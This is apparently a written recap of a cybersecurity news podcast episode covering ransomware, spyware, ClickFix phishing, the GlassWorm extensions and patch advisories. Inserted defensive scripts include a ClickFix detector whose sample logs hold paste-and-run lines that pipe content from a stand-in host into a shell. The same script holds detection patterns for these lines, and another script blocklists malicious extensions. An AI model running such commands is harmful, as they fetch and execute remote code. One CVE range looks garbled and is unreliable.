Good Morning Security Gang
Good morning, Security Gang — and happy Monday! James Azar here, and welcome back to the CyberHub Podcast. Episode 1008, November 10th, 2025. We’re rolling into Veterans Day week — a day I personally hold close to my heart. It’s the day we celebrate those who volunteered to put on the uniform and defend this country. Tomorrow, raise your coffee mug or glass to a veteran you know. Memorial Day is for the fallen. Veterans Day is for the living — and they deserve your gratitude.
Now, today’s show is loaded: we’re doing a full autopsy on Nevada’s ransomware incident, a Congressional Budget Office cyberattack with nation-state fingerprints, a $5.1 million fine that screams “identity hygiene 101,” a Samsung spyware zero-day, a macOS phishing upgrade, AI-powered supply chain trojans, seven QNAP zero-days, and more Cisco chaos. Oh, and Google’s $32 billion acquisition of Wiz just got cleared by the DOJ.
So strap in, double shot espresso in hand — coffee cup cheers, y’all!
Nevada Ransomware: Anatomy of a Statewide Breach
The State of Nevada’s ransomware incident has been fully dissected, and the numbers are in. The initial infection came from a spoofed site download on May 14, planting a backdoor that attackers later used to wipe backups and encrypt virtual machines by August 24. The impact? 60+ state agencies, including the DMV, DHHS, and Department of Public Safety.
Here’s the silver lining — Nevada didn’t pay. They recovered 90% of their data in 28 days, spending $1.3 million on IR, vendor support, and insurance claims. The bad news? 26 accounts were compromised through RDP and remote monitoring misuse, and one confirmed data file was stolen.
Lessons:
Block typosquat downloads.
Enforce application control for installers.
Segment and isolate backups — make them immutable.
Rotate credentials on remote tools.
And practice your 28-day recovery plan — don’t assume backups will save you unless you’ve tested the restore process.
CBO Cyberattack: Nation-State Hackers Breach Congressional Systems
The Congressional Budget Office confirmed a nation-state intrusion that compromised internal messaging and chat data with congressional staffers. Investigators say the breach likely exposed policy-sensitive communications — valuable for foreign intelligence and disinformation efforts.
The CBO has since contained the incident, tightened monitoring, and rolled out new controls. But the real risk lies in long-tail spear phishing campaigns aimed at policymakers and aides.
If you’re managing executive communications:
Enforce phishing-resistant MFA (app-based, not text).
Lock down message exports and retention policies.
Monitor mailbox permission changes.
And enable conditional access for shared inboxes and legislative teams.
Illuminate Fined $5.1 Million for Credential Negligence
Here’s a masterclass in bad hygiene: Education tech firm Illuminate (now rebranded as Renaissance) has been fined $5.1 million by attorneys general in California, Connecticut, and New York for the 2021 data breach that exposed student medical and special education records.
The cause? Stale credentials from an ex-employee were reused by the attacker. Illuminate also failed to segregate backups from production and made false privacy claims about its security posture.
The fallout: millions of minors’ data leaked, 49 states affected, and a full brand overhaul. The takeaway? Account offboarding isn’t optional — it’s survival. Delete old credentials, verify backups are isolated, and audit your privacy promises before regulators do it for you.
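The offboarding and credential-rotation points above can be turned into a routine check. The script below is an added example, not something from the podcast or from Illuminate; it reads a constructed directory export (the column names are assumptions), compares it against an HR roster of current employees, and flags enabled accounts whose owner has left, accounts idle for longer than a threshold, and service credentials that have not been rotated within that threshold.

```python
"""Audit identity records for orphaned, idle, or unrotated credentials.

Added example (not from the podcast). Input is a constructed CSV export in an
assumed layout: username,type,enabled,last_login,last_rotated.
"""
import csv
import io
from datetime import datetime, timedelta

# Constructed sample: what an IdP/directory export might look like.
ACCOUNTS_CSV = """username,type,enabled,last_login,last_rotated
jdoe,user,true,2025-11-08,
msmith,user,true,2025-06-01,
backup-svc,service,true,2025-11-09,2024-12-01
rjones,user,false,2025-01-15,
etl-svc,service,true,2025-11-09,2025-10-20
"""

# Constructed sample: HR roster of people still employed today.
ACTIVE_EMPLOYEES = {"jdoe", "rjones"}

MAX_IDLE_DAYS = 90


def parse_date(value):
    """Return a datetime for YYYY-MM-DD, or None for an empty field."""
    return datetime.strptime(value, "%Y-%m-%d") if value else None


def audit_accounts(csv_text, active_employees, as_of, max_idle_days=MAX_IDLE_DAYS):
    """Return a list of (username, reason) findings for enabled accounts.

    - user accounts whose owner is not in the HR roster -> orphaned
    - any account with no login inside the window        -> idle
    - service accounts whose secret was not rotated      -> stale secret
    """
    findings = []
    cutoff = as_of - timedelta(days=max_idle_days)
    for row in csv.DictReader(io.StringIO(csv_text)):
        name = row["username"]
        if row["enabled"].strip().lower() != "true":
            continue  # disabled accounts are not a live credential
        if row["type"] == "user" and name not in active_employees:
            findings.append((name, "orphaned: owner no longer employed but account enabled"))
        last_login = parse_date(row["last_login"])
        if last_login is None or last_login < cutoff:
            findings.append((name, f"idle: no login in {max_idle_days} days"))
        if row["type"] == "service":
            rotated = parse_date(row["last_rotated"])
            if rotated is None or rotated < cutoff:
                findings.append((name, f"stale secret: not rotated in {max_idle_days} days"))
    return findings


if __name__ == "__main__":
    for user, reason in audit_accounts(ACCOUNTS_CSV, ACTIVE_EMPLOYEES, datetime(2025, 11, 10)):
        print(f"{user}: {reason}")
```

Run against the sample, the audit reports the ex-employee account that was never disabled (twice: orphaned and idle) and the backup service account whose secret is almost a year old. The disabled account is skipped on purpose; the point is to surface credentials an attacker could still log in with.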
Landfall Android Spyware Targets Samsung Devices
The Landfall spyware is back, exploiting a zero-day in Samsung devices via WhatsApp message delivery. Palo Alto Networks identified overlaps with CVE-2025-21043, patched back in April, suggesting targeted zero-click exploits.
This campaign targets high-value individuals, likely for surveillance. If you’re on Android, update immediately. Security teams managing mobile fleets should enforce MDM patch compliance, restrict sideloading, and monitor for unauthorized messaging permissions.
macOS “ClickFix” Social Engineering Evolves
Mac users, beware — the new wave of ClickFix attacks mimics Cloudflare verification pages and uses fake countdowns and tutorials to trick users into running terminal commands. These are now dropping InfoStealer variants like Seamus and Amos via disguised “how-to” guides.
Mitigation steps:
Use browser isolation for untrusted sites.
Add EDR rules for clipboard or curl-based terminal calls.
Train users specifically on ClickFix-style phishing.
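The “EDR rules for clipboard or curl-based terminal calls” item is concrete enough to sketch. The script below is an added example, not from the podcast or from any EDR vendor: it runs a small set of pattern rules over constructed shell-audit log lines (the timestamp/user/command layout is an assumption) and reports commands that hand remote, base64-decoded, or pasteboard content straight to a shell, which is the behaviour ClickFix lures depend on.

```python
"""Flag paste-and-run command patterns in shell audit logs.

Added example (not from the podcast). Rules are a starting point for an EDR
or audit-log query, not a complete rule set. Sample log lines are constructed.
"""
import re

# (rule name, compiled pattern); all patterns are case-insensitive.
RULES = [
    ("remote_script_piped_to_shell",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|)sh\b", re.I)),
    ("base64_decode_to_shell",
     re.compile(r"base64\s+(-d|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z|)sh\b", re.I)),
    ("pasteboard_to_shell",
     re.compile(r"\bpbpaste\b[^|]*\|\s*(sudo\s+)?(ba|z|)sh\b", re.I)),
    ("inline_eval_of_remote_content",
     re.compile(r"\beval\b[^\n]*\$\((curl|wget)\b", re.I)),
]

# Constructed sample in an assumed "timestamp user command" layout.
SAMPLE_LOG = """\
2025-11-10T09:01:02Z alice git pull --rebase
2025-11-10T09:03:44Z alice curl -fsSL http://verify.invalid/check.sh | bash
2025-11-10T09:05:10Z bob echo aGVsbG8= | base64 -d | sh
2025-11-10T09:06:30Z bob pbpaste | zsh
2025-11-10T09:07:00Z carol curl -O https://example.invalid/report.pdf
2025-11-10T09:08:12Z dave eval "$(curl -s http://verify.invalid/fix.txt)"
"""


def parse_line(line):
    """Split one audit line into (timestamp, user, command)."""
    ts, user, cmd = line.split(" ", 2)
    return ts, user, cmd


def scan_log(text):
    """Return one alert dict per command that matches any rule."""
    hits = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        ts, user, cmd = parse_line(raw)
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append({"time": ts, "user": user, "rule": name, "command": cmd})
                break  # one alert per command is enough
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"[{hit['rule']}] {hit['time']} {hit['user']}: {hit['command']}")
```

The plain `curl -O` download is deliberately not flagged: fetching a file is normal developer activity, and the signal worth alerting on is the pipe into a shell interpreter, not the download itself. Tune the rules to your fleet's tooling before turning them into blocking actions.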
The adversaries are blending UX design with malware deployment, and it’s working frighteningly well.
“You always want to block typosquat downloads. You should enforce application control for installers. You should segment and lock backup networks – they should be immutable, they should be out of bounds. I say you should rehearse a recovery playbook, period.” James Azar
GlassWorm Supply Chain Attack Infects Dev Ecosystem
The GlassWorm campaign has returned with three new malicious VS Code extensions published to the Open VSX registry, using Unicode obfuscation and Solana transactions for C2 operations.
Targets include developers, crypto wallets, and government IT teams, with over 60 victims confirmed globally. The infected extensions — ai-driven-dev.ai, hamu.history-in-sublime-merge, and yasayuki.transient-emacs — have been downloaded 10,000+ times combined.
Recommendations:
Blocklist infected extensions.
Enforce publisher provenance for internal dev tools.
Rotate developer tokens and shorten TTLs.
Run secret scanning and monitor for Solana RPC beacons in build environments.
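The first two recommendations (blocklist the named extensions, enforce publisher provenance) can be scripted against the manifest VS Code keeps for installed extensions. The script below is an added example, not from the podcast or from the GlassWorm research: it assumes the manifest is a JSON array whose entries carry `identifier.id` and `version`, uses the three extension IDs named above as the blocklist, and reports any other extension whose publisher is not on a hypothetical organisational allowlist. The manifest it runs on here is constructed sample data.

```python
"""Audit installed VS Code extensions against a blocklist and a publisher allowlist.

Added example (not from the podcast or any vendor tooling). Assumed manifest
layout: JSON array of objects with identifier.id ("publisher.name") and version.
"""
import json
from pathlib import Path

# Extension IDs named in the episode, used as the blocklist.
GLASSWORM_EXTENSIONS = {
    "ai-driven-dev.ai",
    "hamu.history-in-sublime-merge",
    "yasayuki.transient-emacs",
}

# Hypothetical organisational allowlist of vetted publishers.
ALLOWED_PUBLISHERS = {"ms-python", "redhat", "golang"}

# Constructed sample manifest (mixed-case ID included on purpose).
SAMPLE_MANIFEST = json.dumps([
    {"identifier": {"id": "ms-python.python"}, "version": "2025.1.0"},
    {"identifier": {"id": "hamu.history-in-sublime-merge"}, "version": "0.0.3"},
    {"identifier": {"id": "Yasayuki.Transient-Emacs"}, "version": "1.2.0"},
    {"identifier": {"id": "someone.unknown-helper"}, "version": "0.1.0"},
])


def audit_manifest(manifest_text, blocklist=GLASSWORM_EXTENSIONS, allowed=ALLOWED_PUBLISHERS):
    """Return {'blocked': [(id, version)], 'unvetted': [(id, publisher)]}."""
    blocked, unvetted = [], []
    for entry in json.loads(manifest_text):
        ext_id = entry["identifier"]["id"]
        norm = ext_id.lower()  # extension IDs are compared case-insensitively here
        publisher = norm.split(".", 1)[0]
        if norm in blocklist:
            blocked.append((ext_id, entry.get("version", "?")))
        elif publisher not in allowed:
            unvetted.append((ext_id, publisher))
    return {"blocked": blocked, "unvetted": unvetted}


def audit_installed(extensions_dir=Path.home() / ".vscode" / "extensions"):
    """Audit the local manifest; returns None if no manifest is present."""
    manifest = extensions_dir / "extensions.json"
    if not manifest.exists():
        return None
    return audit_manifest(manifest.read_text(encoding="utf-8"))


if __name__ == "__main__":
    result = audit_installed() or audit_manifest(SAMPLE_MANIFEST)
    for ext_id, version in result["blocked"]:
        print(f"BLOCKED  {ext_id} ({version})")
    for ext_id, publisher in result["unvetted"]:
        print(f"UNVETTED {ext_id} (publisher '{publisher}' not allowlisted)")
```

On the sample, both blocklisted extensions are reported even though one is installed under a different letter case, the allowlisted Python extension passes, and the unknown publisher is surfaced for review rather than blocked outright. Run it across developer workstations through your management tooling to get fleet-wide coverage.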
This is the new battleground — the developer’s workstation.
QNAP Patches Seven Critical Zero-Days
After the Pwn2Own Ireland contest, QNAP has patched seven zero-days affecting QTS, HBS3, and QuTS hero systems. These bugs (CVE-2025-62847 through CVE-2025-11837) could lead to data theft, crypto-locking, and backup compromise.
Admins should:
Update to the latest firmware versions.
Restrict admin UI to VPN access.
Rotate NAS credentials and monitor for new sync jobs.
These storage systems are constant APT targets — unpatched QNAP boxes are effectively open doors.
Cisco ASA Zero-Days Now Used in Denial-of-Service Attacks
Cisco’s chained zero-days — CVE-2025-20362 and CVE-2025-20333 — are now being weaponized for denial-of-service attacks on unpatched ASA and FTD firewalls. The ArcaneDoor group, linked to a state actor, is leveraging these to force device reboots and disrupt corporate networks.
If you’re running Cisco perimeter hardware:
Patch immediately.
Decommission end-of-life ASAs.
Restrict management interfaces by geography and ASN.
Continuously hunt for LineDancer or LineRunner artifacts.
Thirty-four thousand devices remain vulnerable — don’t be one of them.
EU Expands Biometric Surveillance, Sparking Civil Liberty Concerns
The European Parliament has voted to expand data sharing and biometric collection under the guise of anti-trafficking and anti-smuggling initiatives. Privacy groups warn this effectively greenlights mass surveillance across EU borders.
“I love how Europe’s always going after civil liberties by saying, ‘Look, we just want to fight human trafficking and migrant smuggling.’ So you created a problem with your own laws in the EU parliament when you allowed unvetted migrants and gangs to come into your continent. Now you want to go after the civil liberties of your dual citizens to do just that.” James Azar
Europe, once the privacy champion of the digital world, now risks repeating the same overreach it criticizes in others. It’s a lesson in how fear-driven regulation can erode the very freedoms it aims to protect.
Google’s $32 Billion Wiz Acquisition Cleared by DOJ
The U.S. Department of Justice has approved Google’s $32 billion acquisition of Wiz, one of the largest cybersecurity deals in history. The acquisition, initiated in March 2025, is now expected to close in early 2026 pending international review.
For the industry, this marks a major milestone — a sign of big tech’s deepening investment in cloud-native security platforms. Wiz CEO Assaf Rappaport called it “the next step in securing the cloud’s foundation.”
Whether this accelerates innovation or consolidates control — time will tell. But for now, it’s a defining moment for cybersecurity as a business driver, not just a risk domain.
Action List
🔐 Segment backups and make them immutable.
🧑‍💻 Delete stale credentials immediately after offboarding.
📱 Update all Samsung and Android devices to the latest firmware.
🍎 Train users on macOS ClickFix phishing tactics.
🧩 Audit VS Code and Open VSX extensions for malicious code.
🧱 Patch QNAP and Cisco ASA systems before end of day.
🌍 Review privacy policies under new EU surveillance directives.
💰 Monitor the Wiz acquisition impact on cloud vendor dependencies.
Memorable Quotes by James Azar
“They didn’t hack in — they logged in, again.”
“Complacency isn’t a vulnerability; it’s an exploit waiting to happen.”
James Azar’s CISO’s Take
This episode felt like a masterclass in modern failure modes — from ransomware resilience in Nevada to hygiene negligence at Illuminate, and from spyware weaponization on Android to supply chain breaches hitting developers. The pattern is crystal clear: complexity without discipline equals exposure.
My biggest takeaway? Security isn’t just about patching code — it’s about patching habits. Old accounts, untested backups, unverified extensions — these are the cracks adversaries exploit. We’re seeing the same themes across states, schools, enterprises, and governments: lack of preparation, poor segmentation, and blind trust in systems we never fully controlled.
The good news? Every story today had a recovery path. The bad news? Most of those recoveries came after impact. So take this as your Monday reminder, Security Gang — build resilience before the breach, not after.
Stay sharp, stay caffeinated, and as always — stay cyber safe.